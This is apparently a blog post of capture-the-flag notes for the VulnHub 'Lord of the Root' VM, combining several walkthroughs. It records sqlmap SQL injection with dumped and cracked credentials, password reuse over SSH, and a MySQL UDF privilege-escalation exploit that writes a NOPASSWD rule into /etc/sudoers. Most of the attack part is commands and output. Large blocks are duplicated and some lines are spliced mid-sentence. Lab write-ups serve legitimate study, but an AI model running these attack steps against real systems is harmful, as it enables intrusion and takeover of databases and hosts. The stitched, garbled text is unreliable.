Walkthru
A. https://trickster0.wordpress.com/2015/10/08/lord-of-the-root-1-0-1-write-up/ [sqlmap, medusa]
B. https://alexandervoidstar.wordpress.com/2016/12/04/ctf-writeup-lord-of-the-root-1-0-1/
[sqlmap, Tamper data intercept, privilege escalation]
C. http://www.jkcybersecurity.org/2016/11/vulnhub-lord-of-root-writeup.html [Burpsuite]
D. http://www.hackingarticles.in/hack-lord-root-vm-ctf-challenge/ [Metasploit]
E. https://github.com/Hamza-Megahed/CTFs/blob/master/lord-of-the-root/README [MySQL Local Privilege Escalation UDF, getting a user sudo access from MYSQL]
F. https://dook.biz/2015/10/vulnhub-lord-of-the-root-writeup/ [1518.c mysql exploit]
G. http://bullsecurity.blogspot.com/2015/09/lord-of-root-rooted.html [MySQL Local Privilege Escalation UDF but /tmp/setuid file is not present]
C. http://www.jkcybersecurity.org/2016/11/vulnhub-lord-of-root-writeup.html [Burpsuite]
D. http://www.hackingarticles.in/hack-lord-root-vm-ctf-challenge/ [Metasploit]
E. https://github.com/Hamza-Megahed/CTFs/blob/master/lord-of-the-root/README [MySQL Local Privilege Escalation UDF, getting a user sudo access from MYSQL]
F. https://dook.biz/2015/10/vulnhub-lord-of-the-root-writeup/ [1518.c mysql exploit]
G. http://bullsecurity.blogspot.com/2015/09/lord-of-root-rooted.html [MySQL Local Privilege Escalation UDF but /tmp/setuid file is not present]
All https://www.vulnhub.com/entry/lord-of-the-root-101,129/
Notes:
1.
Nmap scan using recon and standalone nmap tcp
and udp scan shows 22only
2.
Running tcpdump and listening for anything from
victim didn’t reveal anything either
3.
Tried ssh @ targetIP , shows a logo and a
message Easy as 1,2,3
4.
Tried port knocking with 123 which revelaed a
new port tcp 1337
5.
Dirb and nito on the webserver/port 1337
6.
Found few pics under /images. Ran strings, file
and exiftool on them but no luck.
7.
At the index.html page, there is a girl on a horse.
Source of the page didn’t include anything. Pic says “ I will take ring into
the Mordor
8.
I added “/Mordor” to the webserver which revealed
another pics. Source of the pix included a code and when I decoded it, reveal
another code which would also need to be decoded and it will reveal a link to page
which is a login page which says “Welcome to the Gates of Mordor”
9.
After testing a few sql queries i didnt have
much success so i thought to fire up sqlmap and watch some magic happens with
hopefully some of the parameters…
root@kali:~/Desktop# sqlmap -o -u
"http://192.168.124.138:1337/978345210/index.php" --forms –dbs
In actual, I saw only Webapp db and at another time above cmd didnt show any database.
now lets get the tables for the webapp db
root@kali:~/Desktop# sqlmap -o -u "http://192.168.124.138:1337/978345210/index.php" --forms -D Webapp --tables
We can see a nice table called Users so lets see the columns of it 😀
root@kali:~/Desktop# sqlmap -o -u "http://192.168.124.138:1337/978345210/index.php" --forms -D Webapp -T Users --columns
so we saw some interesting columns but lets choose the best of them…lets get the dumps now 😀
root@kali:~/Desktop# sqlmap -o -u "http://192.168.124.138:1337/978345210/index.php" --forms -D Webapp -T Users -C id,username,password --dump
With above cmd, I actually saw two username. Tried it again and worked just fine.
Option B Sqlmap using Walkthru B.
How did I get the value of --data ? used Tamper data intercept chrome plugin..
-sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3
#sqlmap -o -u "http://10.0.1.4:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --dbs
..shows list of all databases. same result without --method=POST but not without data="username=admin&password=pass&submit=+Login+"
#sqlmap -o -u "http://10.0.1.4:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" -D "Webapp" --dump
..shows list of all tables and content of the database "Webapp"
smeagol@192.168.56.101's password: MyPreciousR00t
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)
smeagol@LordOfTheRoot:~$
===========
Walkthru from E. Also tried walkthru from G but cannot find /tmp/setuid.c file so the chmod file doesnt work although there are not error when ran the command.
https://0xdeadbeef.info/exploits/raptor_udf2.c
mysql is runing as root so i tried MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation Exploit
it is exploit that gets mysql to run system commands
cat /usr/share/exploitdb/platforms/linux/local/1518.c
copied it into VM
# gcc -g -c raptor_udf2.c
# gcc -g -shared -Wl,-soname,raptor_udf2.so -oraptor_udf2.so raptor_udf2.o -lc
# mysql -u root -p (password : darkshadow )
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name | ret | dl | type |
+-----------+-----+----------------+----------+
| do_system | 2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)
mysql> select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');
mysql> exit
# sudo bash
..where
# whoami
root
# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
Option B Sqlmap using Walkthru B.
How did I get the value of --data ? used Tamper data intercept chrome plugin..
-sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3
...snip, snip, snip...
[11:58:45] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[11:58:45] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 11:58:45
This result amused me, because most other people who did this CTF did not seem to have problems identifying vulnerabilities at this stage. Nevertheless, the program itself is suggesting a possible solution to the problem. In a real world scenario, I would hesitate far more to do intrusive tests or tests with a higher risk, but this is a virtual machine in my home lab, and the worst that can happen is for me to break it and need to restart the challenge from scratch – which is an unlikely scenario, despite my substantial lack of experience. So let us run a more intrusive test.
root@kali:~# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3
...snip, snip, snip...
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
...snip, snip, snip...
sqlmap identified the following injection point(s) with a total of 2553 HTTP(s) requests:
---
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))GYdi)-- cmKG&password=pass&submit= Login
---
[12:10:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[12:10:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'[*] shutting down at 12:10:54
root@kali:~#
That is more like it! We now have the database. We know the database type too, so we can run a narrower test now, limiting our injections to MySQL only. First, let us run a standard dump and see what we can find.
root@kali:~# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --dump
...snip, snip, snip...
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password |
+----+----------+------------------+
| 1 | frodo | iwilltakethering |
| 2 | smeagol | MyPreciousR00t |
| 3 | aragorn | AndMySword |
| 4 | legolas | AndMyBow |
| 5 | gimli | AndMyAxe |
+----+----------+------------------+..shows list of all databases. same result without --method=POST but not without data="username=admin&password=pass&submit=+Login+"
#sqlmap -o -u "http://10.0.1.4:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" -D "Webapp" --dump
..shows list of all tables and content of the database "Webapp"
root@kali:~# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords
method=POST --level=3 --threads=10 --dbms=MySQL --dump
...snip, snip, snip...
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'lordoftheroot'
...snip, snip, snip...
[13:07:26] [INFO] writing hashes to a temporary file '/tmp/sqlmapZFTf385534/sqlmaphashes-8cm8Pw.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[13:07:41] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[13:07:51] [INFO] using default dictionary
...snip, snip, snip...
[13:08:02] [INFO] cracked password 'darkshadow' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
clear-text password: darkshadow[13:08:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'
[*] shutting down at 13:08:13
..would use SQLMAP default db to extract hash and crack the user/pwd using default db OR if you could decrypt the hash using online site such as https://crackstation.net/. I got the same pwd both ways from the hash
We were lucky enough to crack the root password with the default dictionary. If that had not happened, we could have also rerun the test with a bigger wordlist. There are several good wordlists on the HashCat forums and, for hardcore password crackers, CrackStation has a 15GB wordlist up for download.
Too bad, however. Trying to SSH into the machine or logging to the LOTR site as root with the password we found will not work.
So what now? Credential reuse would be my next hypothesis. Many people tend to reuse their credentials, even if they are aware such a practice is insecure. If we cannot log in as root, then maybe we can log in as another of the database users we found: frodo, smeagol, aragorn, legolas and gimli.
root@kali:~# ssh smeagol@192.168.56.101So what now? Credential reuse would be my next hypothesis. Many people tend to reuse their credentials, even if they are aware such a practice is insecure. If we cannot log in as root, then maybe we can log in as another of the database users we found: frodo, smeagol, aragorn, legolas and gimli.
smeagol@192.168.56.101's password: MyPreciousR00t
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)
smeagol@LordOfTheRoot:~$
Hooray for credentials reuse, for once!. I tried to su with the root pwd that we found earlier but it failed
There is another interesting piece of information contained in this login. The machine we are on is a Ubuntu 14.04 LTS machine. There are several known privilege escalation exploits for Ubuntu, such as this one.
a. Download the exploit to Kalib. Transfer to victim host using wgetc. compile using gcc, chmod, run
smeagol@LordOfTheRoot:/tmp$ chmod +x 39166.out
smeagol@LordOfTheRoot:/tmp$ ./39166.out
root@LordOfTheRoot:/tmp# whoami
rootWalkthru from E. Also tried walkthru from G but cannot find /tmp/setuid.c file so the chmod file doesnt work although there are not error when ran the command.
https://0xdeadbeef.info/exploits/raptor_udf2.c
mysql is runing as root so i tried MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation Exploit
it is exploit that gets mysql to run system commands
cat /usr/share/exploitdb/platforms/linux/local/1518.c
copied it into VM
# gcc -g -c raptor_udf2.c
# gcc -g -shared -Wl,-soname,raptor_udf2.so -oraptor_udf2.so raptor_udf2.o -lc
# mysql -u root -p (password : darkshadow )
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name | ret | dl | type |
+-----------+-----+----------------+----------+
| do_system | 2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)
mysql> select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');
mysql> exit
# sudo bash
..where
bash is command to run with sudo. This command runs bash as a super user.# whoami
root
# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
Comments
Post a Comment